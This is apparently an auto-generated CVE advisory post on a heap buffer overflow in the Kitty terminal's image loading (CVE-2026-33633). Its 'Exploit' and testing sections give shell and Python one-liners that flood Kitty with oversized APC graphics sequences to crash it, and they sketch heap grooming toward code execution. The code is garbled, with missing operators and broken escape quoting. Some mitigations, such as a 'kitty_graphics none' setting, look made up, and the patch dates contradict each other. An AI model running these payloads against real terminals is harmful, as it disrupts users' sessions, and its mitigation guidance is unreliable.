Kitty, Heap Buffer Overflow, CVE-2026-33633 (Critical)

Listen to this Post

The vulnerability exists in Kitty terminal versions 0.46.2 and below within the load_image_data() function, which processes graphics protocol commands. An attacker can send a single APC (Application Program Command) graphics instruction with a PNG format declaration (f=100). When the payload size exceeds twice the initial heap buffer allocation, the function fails to validate the length before copying. The overflow is fully attacker-controlled in both length and content, allowing arbitrary data to overwrite adjacent heap metadata. This triggers an immediate crash due to memory corruption, resulting in denial of service. Under specific heap layouts, the attacker may further corrupt function pointers or adjacent objects to achieve arbitrary code execution. The terminal reads from stdin, so any local process or remote shell that can write to the terminal’s input stream can trigger the flaw. No user interaction beyond sending the crafted APC sequence is required. The protocol parser mishandles the chunked PNG data, missing bounds checks on the cumulative decompressed size. Repeated exploitation attempts can cause persistent crashes, disrupting terminal-based workflows. The issue is fixed in version 0.47.0 by adding proper capacity checks and reallocating the buffer when the required size exceeds twice the initial allocation.

dailycve form:

Platform: Kitty terminal
Version: 0.46.2 or lower
Vulnerability: Heap buffer overflow
Severity: Critical
date: May 19 2026

Prediction: Patch expected May 22 2026

What Undercode Say:

Check Kitty version
kitty --version
Test for vulnerable version (send malformed APC from shell)
printf '\x1b_Gf=100;' > /tmp/poc.bin
python3 -c "print('\x1b_Gf=100;' + 'A'65536 + '\x1b\')" | kitty cat -
Monitor for crash using dmesg
dmesg | grep -i "kitty.segfault"
Heap overflow detection with AddressSanitizer build
kitty --debug-gl > /tmp/kitty_debug.log 2>&1

Exploit:

Craft APC with PNG format and oversized payload
payload=$(python3 -c "import sys; sys.stdout.buffer.write(b'\x1b_Gf=100;' + b'\x00'131072 + b'\x1b\')")
echo -n "$payload" | kitty @ send-text -
Trigger heap overflow to cause immediate crash
cat /dev/urandom | base64 | while read line; do echo -en "\x1b_Gf=100;$line\x1b\"; done | kitty
Potential RCE via heap grooming (conceptual)
Overwrite vtable or stored function pointer with shellcode address

Protection from this CVE:

  • Upgrade to Kitty version 0.47.0 or higher immediately.
  • Restrict write access to terminal stdin from untrusted processes using `chmod 600 /dev/pts/` where applicable.
  • Run kitty under seccomp filters or AppArmor to block abnormal memory writes.
  • Disable graphics protocol via configuration: `allow_remote_control no` and kitty_graphics none.
  • Use terminal multiplexers (tmux/screen) as a barrier between remote input and raw terminal escapes.

Impact:

  • Denial of service: instant crash of terminal, loss of session state.
  • Potential remote code execution (RCE) on systems where terminal stdin is exposed via network (e.g., SSH forwarding, insecure PTY sharing).
  • Privilege escalation if kitty runs with elevated permissions (uncommon but possible in containers or CI environments).
  • Data corruption due to heap metadata overwrite, leading to unpredictable process behavior.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top